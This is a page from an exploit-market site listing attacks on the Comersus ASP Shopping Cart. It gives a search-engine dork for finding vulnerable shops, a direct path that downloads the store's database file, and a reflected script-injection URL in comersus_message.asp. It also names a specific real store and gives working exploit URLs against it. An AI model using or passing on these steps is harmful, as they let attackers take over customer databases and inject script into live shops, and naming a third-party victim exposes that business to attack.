[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4284
Category
web applications
Date add
27-11-2008
Platform
unsorted
===================================================================
Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities
===================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1


[+] Script               : Comersus Cart

[+] Exploit Type         : Multiple Exploits (XSS + remote database disclosure)

[+] Script's Homepage    : http://comersus.com

[+] Google Dork          : inurl:.asp?   Powered by Comersus ASP Shopping Cart


--//--> Exploit : 

1) Remote Database Disclure :

http://[website]/[script]/database/commersus.mdb


2) Remote XSS exploit : 

In simple words :

http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]


[Peace xD ]


//Example for str0ke : 

https://www.tarkentonsports.com/Comersus/database/comersus.mdb

https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20]



#  0day.today [2024-12-26]  #